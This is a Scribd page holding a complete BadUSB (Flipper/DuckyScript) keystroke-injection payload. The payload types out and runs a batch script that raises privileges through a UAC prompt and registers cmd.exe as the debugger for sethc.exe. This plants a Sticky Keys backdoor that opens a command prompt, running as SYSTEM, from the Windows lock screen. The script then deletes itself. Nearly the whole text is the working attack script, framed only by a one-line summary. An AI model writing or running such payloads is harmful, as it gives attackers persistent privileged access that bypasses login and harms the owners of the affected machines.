Scribd
Upload
14 views2 pages

Command Line Backdoor

This document describes a method for creating a command prompt backdoor in Windows environments using Sticky Keys shortcuts. It includes a script that elevates privileges and installs a payload to execute commands with elevated rights. The method is categorized under Remote Access and is intended for use in secure environments.

Uploaded by

Balázs Antal
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
14 views2 pages

Command Line Backdoor

This document describes a method for creating a command prompt backdoor in Windows environments using Sticky Keys shortcuts. It includes a script that elevates privileges and installs a payload to execute commands with elevated rights. The method is categorized under Remote Access and is intended for use in secure environments.

Uploaded by

Balázs Antal
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)

REM Description: Creates a command prompt "backdoor" that can be launched in almost
any "secure" Windows environment,
REM (Lock Screen for example) via Sticky Keys shortcuts (Pressing shift five times)
or the keyboard combination Alt+Shift+PrtScr.
REM This then results in launching the command prompt in the same account as the
current environment, i.e. SYSTEM or your user account.
REM Version: 1.0
REM Category: Remote_Access
REM plug in second USB in before the Flipper
DELAY 3000
CONTROL ESCAPE
DELAY 500
STRING notepad
DELAY 250
ENTER
DELAY 750
STRING @echo off
ENTER
STRING :init
ENTER
STRING setlocal DisableDelayedExpansion
ENTER
STRING set cmdInvoke=1
ENTER
STRING set winSysFolder=System32
ENTER
STRING set "batchPath=%~0"
ENTER
STRING for %%k in (%0) do set batchName=%%~nk
ENTER
STRING set "TEMPVBS=%temp%\OEgetPriv_run.vbs"
ENTER
STRING setlocal EnableDelayedExpansion
ENTER
STRING :checkPrivileges
ENTER
STRING NET FILE 1>NUL 2>NUL
ENTER
STRING if '%errorlevel%' == '0' (goto gotPrivileges) else (goto getPrivileges)
ENTER
STRING :getPrivileges
ENTER
STRING if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges)
ENTER
STRING echo Set UAC = CreateObject^("Shell.Application"^) > "%TEMPVBS%"
ENTER
STRING echo args = "ELEV " >> "%TEMPVBS%"
ENTER
STRING echo For Each strArg in WScript.Arguments >> "%TEMPVBS%"
ENTER
STRING echo args = args ^& strArg ^& " " >> "%TEMPVBS%"
ENTER
STRING echo Next>> "%TEMPVBS%"
ENTER
STRING if '%cmdInvoke%'=='1' goto InvokeCmd
ENTER
STRING echo UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%TEMPVBS%"
ENTER
STRING goto ExecElevation
ENTER
STRING :InvokeCmd
ENTER
STRING echo args = "/c """ + "!batchPath!" + """ " + args >> "%TEMPVBS%"
ENTER
STRING echo UAC.ShellExecute "%SystemRoot%\%winSysFolder%\cmd.exe", args, "",
"runas", 1 >> "%TEMPVBS%"
ENTER
STRING :ExecElevation
ENTER
STRING "%SystemRoot%\%winSysFolder%\WScript.exe" "%TEMPVBS%" %*
ENTER
STRING exit /B
ENTER
STRING :gotPrivileges
ENTER
STRING setlocal & cd /d "%~dp0."
ENTER
STRING if '%1'=='ELEV' (del "%TEMPVBS%" 1>nul 2>nul & shift /1)
ENTER
STRING reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File
Execution Options\sethc.exe" /ve /f && reg add "HKLM\Software\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d
"cmd.exe" /f && cls && echo Payload Installed Successfully && pause && goto end
ENTER
STRING cls
ENTER
STRING echo Payload Install Failed
ENTER
STRING pause
ENTER
STRING :end
ENTER
STRING del /F /Q "%~0" && exit
CONTROL s
DELAY 500
STRING %temp%\run.bat
TAB
STRING a
ENTER
DELAY 250
ALT F4
DELAY 250
CONTROL ESCAPE
DELAY 500
STRING %temp%\run.bat
ENTER

You might also like